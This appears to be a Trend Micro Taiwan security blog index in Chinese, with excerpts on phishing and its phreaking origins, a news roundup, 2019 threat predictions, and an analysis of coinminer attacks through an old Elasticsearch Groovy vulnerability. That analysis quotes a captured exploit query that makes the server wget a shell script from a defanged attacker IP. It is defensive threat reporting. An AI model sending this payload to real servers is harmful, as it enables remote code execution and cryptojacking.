【資安漫畫】什麼是網路釣魚?何謂 Phishing? (同場加映:魚叉式網路釣魚Spear Phishing)

對許多人來說,聖誕節和新年等節日是購物和花錢的季節。但在網路犯罪分子眼裡則有別的意思 – 他們認為這是進行網路釣魚偷竊個資的黃金季節。請參考 你愛的聖誕禮物,網路釣客也愛~年底十大網路釣魚最愛購物頁面 。

  網路釣魚通常是指企圖透過電子郵件、通訊軟體來獲得你個人資訊以竊取你的身份認證。大多數網路釣魚會企圖讓自己看起來像是一般行為,實際上卻是用於犯罪活動。它們看起來就像是來自銀行、信用卡公司、信譽良好的公私立機構的正式通知,通常在訊息中會夾帶惡意連結,引導收件者至看起來與官方極為相似的山寨網站,要求提供帳號密碼等資訊。

    網路釣魚(Phishing)的起源   

 網路釣魚(Phishing)的起源可回溯至 1970 年代的飛客 (phreaking) 入侵手法,這種手法利用簡單的兒童玩具哨子就能非法使用電話系統,至今依然惡名昭彰。網路釣魚延續了電話飛客手法的傳統,同樣都是爲獲取實質利益而將專業技術用於不正當的用途。相關報導

Phishing The Cap'n Crunch Whistle 玉米片附贈的玩具哨子,因為與“網路釣魚”有關,而身價大漲
一個玉米片附贈的玩具哨子能製造出核准通話的 2600 Hz 音頻,成爲飛客 (phreaking) 盜撥電路的主要工具。

繼續閱讀

《資安新聞周報》鸚鵡居然叫 Alexa 下訂西瓜和燈泡/駭客利用 Twitter 發送 Meme迷因梗圖/客攻擊由 IT 轉向 OT,人機界面是主要漏洞

本周資安新聞週報重點摘要,本文分享上週資安新聞及事件。你將會看到新聞的簡短摘要及原文連結來閱讀更詳細的見解。

資安趨勢部落格一周精選

媒體資安新聞精選:

趨勢科技2018年Capture The Flag (CTF)網路攻防搶旗賽台灣隊伍奪冠,年輕好手體驗真實的網路資安世界  在網路資安關鍵領域大展身手     電腦硬派月刊

趨勢科技的 2019 資安年度大預測:駭客攻擊由 IT 轉向 OT,人機界面是主要漏洞      科技報橘網

《科技》趨勢科技2019資安年度預測報告,3點警示   中時電子報網

小心!別亂點連結 趨勢科技:2019年網路釣魚估大增        ETtoday新聞雲

駭帳號將超越駭系統!趨勢公布 2019 攻擊預測大全    INSIDE

趨勢科技公布2019資訊保安預測      Media OutReach

LINE登入不必輸入密碼 最快明年上路      工商時報電子報

兩年前被Twitter輕忽的臭蟲遭到駭客開採,洩漏用戶的國碼       iThome

多樣的社交工程手法網紅成駭客新目標,入侵掌握帳號或是當作散佈惡意連結的管道    科技新報網

打擊假新聞 不要劃錯重點  自由時報

趨勢科技網路攻防搶旗賽 台灣隊伍奪冠  中央通訊社

四種電子郵件 威脅企業安全      CIO IT經理人

【資安】一頁式詐騙不只臉書&#65281,就算入口網站&#12289,Yahoo新聞也有陷阱  這是假消息

間諜皮卡丘?俄網軍介入大選,Pokémon Go成煽動工具       聯合新聞網

人臉辨識真的安全嗎!? 3D列印頭像成功騙過Samsung S9,但iPhone X擋住了  iThome

隱私被看光?澳洲通過新法 允許政府取得加密訊息      匯流新聞網

推特爆個資外洩疑慮 股價重挫7%    聯合新聞網

42款中國APP會竊取個資?印度政府當時呼籲軍方刪除!   這是假消息

注意了!偽造的Office 365無法傳遞通知成為駭客網釣新手法     iThome

SQLite爆重大漏洞! 數百萬app和IoT裝置資料安全拉警報  iThome

人工智慧仍然存在信任問題        電子工程專輯

聖誕節玩具驚選,你的玩具可能讓孩子暴露在危險之下        Content Party

2018年最糟糕的25組密碼揭曉 這2組蟬聯冠亞軍       匯流新聞網

2018年密碼觀念最差者:五角大厦、Nutella榜上有名,Google意外拿下第八  iThome

語音助理太好用?英國鸚鵡叫 Alexa 下訂西瓜和燈泡   INSIDE

凍結兩個多月後,Windows 10 1809版終於重新開放!但僅限手動下載      iThome

日本 Line強化資料防護 收購南韓網路安全公司    經濟日報(臺灣)

LINE首度揭露LINK區塊鏈生態系將主攻4國市場,包括臺灣!   iThome

AI 種黃瓜大賽結果揭曉,微軟擊敗騰訊、英特爾奪冠   科技新報網

黃背心恐有俄國網軍操作 法國安單位要查      新頭殼

中網攻美軍包商 軍艦、飛彈機密遭駭      自由時報

伊朗駭客假冒Gmail和Yahoo Mail遭駭通知信來發送釣魚郵件,專門鎖定記者、社運人士和官員        iThome

中國駭客疑入侵歐盟外交通訊 上千敏感電文曝光  新頭殼

德國資安辦公室:部份德企可能受中國駭客攻擊    自由時報電子報

雙因素驗證並非100%安全,伊朗駭客成功繞過驗證機制入侵Gmail、Yahoo帳號     T客邦

捷克宣告抵制華為!印度電信業也跟進 致函政府向華為說不      ETtoday新聞雲

跟進封殺 捷克政府禁用華為手機      台灣蘋果日報

以桌遊模擬國家當局資安攻防!捷克資安專家首度在臺舉行相關演練        iThome

推行政府應為雲端服務建立相關規範,雲端安全聯盟促使新加坡當局成立COIR指南      iThome

別說不可能!這六大網路安全問題你一定都遇過!『 PC-cillin 2019雲端版 』教你如何輕鬆預防 雅虎奇摩

趨勢科技:推特帳號淪為駭客攻擊幫兇,發送meme圖片下令惡意程式發動攻擊    iThome

歐盟推超高罰額私隱法 業界憂刺激網絡勒索罪行  東網 (台灣版)

人工智慧加持社會企業,若水建構 AI 數據處理平台為身障者創工作機會 科技新報網

【面對漏洞通報,企業與通報者要能互信】今年HITCON ZeroDay平臺已有14個組織推獎勵計畫        iThome

中華電信資安 防駭大賽奪冠 專業能力堅強 成功抵擋駭客攻擊 發揮互助精神 分享情資 獲頒特別獎        經濟日報(臺灣)

民生公共物聯網產業聯盟 今日(12/17)宣誓成立!  中央通訊社

掌握低成本高效率防禦訣竅,讓資安成為營運助力而不是阻力    聯合新聞網

資安黑天鵝亂竄 還能鴕鳥心態?      聯合報

為臺灣高等資安教育努力,持續強化暑期與跨校課程,與國際結合則成新手段        iThome

強韌的恢復能力已成為資安攻防的重要心法    iThome

讓用戶自然而然操作才是正道,GNOME資安團隊從軟體開發強化作業系統安全 iThome

經濟部推動物聯網資安標章  新通訊元件雜誌

《科技選擇》:我們能讓人工智慧驅動的機器人「自主殺人」嗎?      關鍵評論網

抵禦中國資安威脅 日政府編列預算開發反駭客程式      台灣英文新聞

繼續閱讀

虛擬貨幣病毒透過 Elasticsearch 舊漏洞散播

趨勢科技曾在蜜罐系統上發現了關於搜尋引擎 Elasticsearch (用Lucene程式庫開發的開放原始碼Java搜尋引擎)的惡意挖礦( coinmining )活動。這波攻擊利用了漏洞CVE-2015-1427(位在Groovy 腳本引擎,讓遠端攻擊者可以用特製腳本來執行任意 shell 命令)以及CVE-2014-320(Elasticsearch預設設定內的漏洞)。Elasticsearch已經不再支援有漏洞的版本。

我們在運行Elasticsearch的伺服器上發現帶有以下命令的查詢(ISC也在一篇文章中提到):

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P

/tmp/sssooo\”).getText()”}}}”

這命令是由同個系統/攻擊主機執行,後續病毒也是放在此主機上。在本文編寫時,使用此IP的是網域matrixhazel[.]com(無法連上)。此系統安裝的是CentOS 6,同時運行了網頁伺服器和SSH伺服器。

Figure 1. GreyNoise marked the host as a known scanner

圖1、GreyNotes將此這主機標記為已知掃描器

 

要注意的是,這種攻擊並不新鮮,只是最近又重新出現。趨勢科技的Smart Protection Network 11月在多個地區偵測到虛擬貨幣挖礦病毒,包括了台灣、中國和美國。

挖礦病毒散播bash腳本update.sh的方式是先調用shell來下載並輸出成檔案“/tmp/sssooo“(因為大多數系統對/tmp的限制較少)。

這種攻擊簡單卻會對受害者產生重大的影響。一旦攻擊者可以在系統上執行任意命令,就可以提升權限,甚至將目標轉向其他系統來進一步地入侵網路。

還應該注意的是,雖然大多數案例的攻擊手法相同,但所使用的惡意檔案可能不同。在我們所分析的案例中,使用的是update.sh。一但執行腳本update.sh就會下載檔案devtoolsconfig.json。接著就會部署虛擬貨幣挖礦病毒(趨勢科技偵測為 Coinminer.Linux.MALXMR.UWEIS)。 繼續閱讀

趨勢科技公布2019資安預測:資料外洩攻擊白熱化、網路釣魚攻擊件數明顯大增、工控系統威脅持續升高

企業與個人資安意識內化,採取跨世代防護技術多層式保護連網安全

【2018年12月19日,台北訊】全球網路資安解決方案領導廠商趨勢科技(東京證券交易所股票代碼:4704)發表2019年資安年度預測報告,針對網路安全威脅與網路犯罪攻擊趨勢,提出三大重點警示:憑證資料外洩遭盜用詐騙事件將不斷增加、網路釣魚攻擊手段將取代漏洞攻擊套件成為主要攻擊手法以及工控系統的安全性持續受到威脅。

趨勢科技臺灣區暨香港區總經理洪偉淦表示:「回顧今年全球資安政策推動,可觀察到各組織及企業對於資料安全的重視; 重大資訊安全事件的發生亦凸顯連網裝置普及所面臨的資安問題。預期在2019年企業和組織將導入更多連網設備,而連網速度也將大幅提升,資訊安全將面臨更廣泛與多元的挑戰,不僅企業對於資訊安全團隊的需求將提高,多層式智能防護的資安政策將在企業經營中扮演關鍵的角色,企業領導人對於網路安全的重視及培養經營團隊資安意識,更是建構自身企業網路安全防護架構的重要基石。」

趨勢科技台灣區暨香港區總經理洪偉淦於2019年資安預測媒體活動中表示,預期2019年企業和組織將導入更多連網設備,資訊安全策略將成為企業營運關鍵
趨勢科技台灣區暨香港區總經理洪偉淦於2019年資安預測媒體活動中表示,預期2019年企業和組織將導入更多連網設備,資訊安全策略將成為企業營運關鍵

繼續閱讀